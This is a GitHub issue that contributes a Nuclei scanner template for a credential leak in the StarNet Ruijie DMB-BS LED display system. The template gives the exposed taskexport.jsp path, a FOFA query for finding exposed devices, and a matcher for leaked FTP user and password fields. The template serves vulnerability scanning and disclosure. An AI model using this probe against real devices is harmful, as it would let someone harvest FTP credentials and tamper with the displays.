### ISSUE TITLE
[TEMPLATE CONTRIBUTION] star-net DMB-BS LED Information Distribution System taskexport infoleak

### ISSUE THREAD

**Issue by brucelsone** [projectdiscovery/nuclei-templates#12080]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: star-net-DMB-BS-taskexport-infoleak

info: 
  name: star-net DMB-BS LED Information Distribution System taskexport infoleak
  author: brucelsone
  severity: medium
  description: |
    There is a sensitive information leak in the taskexport interface of the StarNet Ruijie DMB-BS LED Information Distribution System. Attackers can use this vulnerability to read the FTP server address, port, account password, and tamper with the LED publishing information through FTP.
  reference:
    - https://www.ddpoc.com/DVB-2024-7055.html
    - https://blog.csdn.net/shelter1234567/article/details/145521914
  metadata:
    fofa-query: (app="STAR_NET-数字标牌系统" || -欢迎! -- BS3.2.02.38447- || icon_hash="-260118452")
  tags: star-net,ruijie,ftp,password,infoleak

http:
  - method: GET
    path:
      - "{{RootURL}}/dmb/out/taskexport.jsp?taskcode"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains_all(body,'user','pwd')"
```

### Relevant dumped responses

```shell

```
